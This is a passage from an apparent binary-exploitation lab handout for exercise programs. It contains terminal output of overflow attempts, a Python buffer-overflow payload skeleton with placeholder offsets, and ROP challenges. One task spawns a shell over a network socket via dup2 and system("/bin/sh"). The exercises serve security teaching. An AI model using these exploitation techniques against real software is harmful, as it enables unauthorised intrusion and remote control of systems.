hari@solyaris-home:~$ python -c 'print <payload here>' | ./random
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 2070249950. Have fun with it!
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1023098942. Have fun with it!
Segmentation fault (core dumped)
hari@solyaris-home:~$ python -c 'print <payload here>' | ./random
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1152946153. Have fun with it!
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1023098942. Have fun with it!

</code>
  
You can use this Python skeleton for buffer overflow input:

<file python skel.py>
#!/usr/bin/python
import struct, sys

def dw(i):
	return struct.pack("<I", i)

#TODO update count for your prog
pad_count_to_ret = 100
payload = "X" * pad_count_to_ret

#TODO figure out where to return
ret_addr = 0xdeadbeef
payload += dw(ret_addr)


#TODO add stuff after the payload if you need to
payload += ""

sys.stdout.write(payload)
</file>

**Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV).


==== 04. Challenge - Gadget tutorial ====

This task requires you to construct a payload using gadgets and calling the functions inside such that it will print
<code>
Hello!
stage A!stage B!
</code>
Make it also print the messages in reverse order:
<code>
Hello!
stage B!stage A!
</code>
==== Bonus Challenge - Echo service ====
This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/bin/sh") the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. To fix this you need to redirect the socket fd into 0,1 (and optionally 2).

So you will need to do the equivalent of the following in a ROP chain:
<code c>
	dup2(sockfd, 1);
	dup2(sockfd, 0);
	system("/bin/sh");
</code>


Exploit it first with ASLR disabled and then enabled.